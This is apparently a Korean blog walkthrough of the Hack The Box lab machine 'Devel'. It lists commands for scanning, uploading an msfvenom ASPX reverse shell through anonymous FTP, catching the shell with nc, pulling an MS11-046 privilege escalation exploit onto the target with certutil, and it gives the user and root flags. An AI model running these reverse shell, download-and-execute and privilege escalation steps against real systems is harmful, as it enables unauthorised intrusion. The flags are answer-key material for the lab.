Wargame/Hack The Box

[HTB] Devel Writeup

Vardy 2022. 2. 3. 21:32

nmap -sC -sS -sV -O -p- -o scanResultFull.txt 10.129.150.253

ftp에 anonymous 계정으로 접근 가능하므로 리버스쉘을 업로드 하자.

msfvenom -p windows/shell_reverse_tcp LHOST="10.10.14.114" LPORT=1234 -f aspx > reverseShell.aspx

ftp
put reverseShell.aspx

nc -nvlp 1234

권한 상승을 위해 systeminfo 정보 저장 후 wes.py를 통해 유효한 취약점을 찾아보았다.

python3 wes.py systeminfo.txt -i "priv"

그 중 40564.c를 활용하기로 했으며 문서에 안내되어있는대로 컴파일을 했다.

i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32

 

해당 파일을 서버로 옮겨 실행시켜보았다.

certutil -f -split -urlcache http://10.10.14.114:6338/MS11-046.exe c:\temp\MS11-046.exe

 

FLAG = 

[user] 9ecdd6a3aedf24b41562fea70f4cb3e8

[root] e621a0b5041708797c4fc4728bc72b4b

 

반응형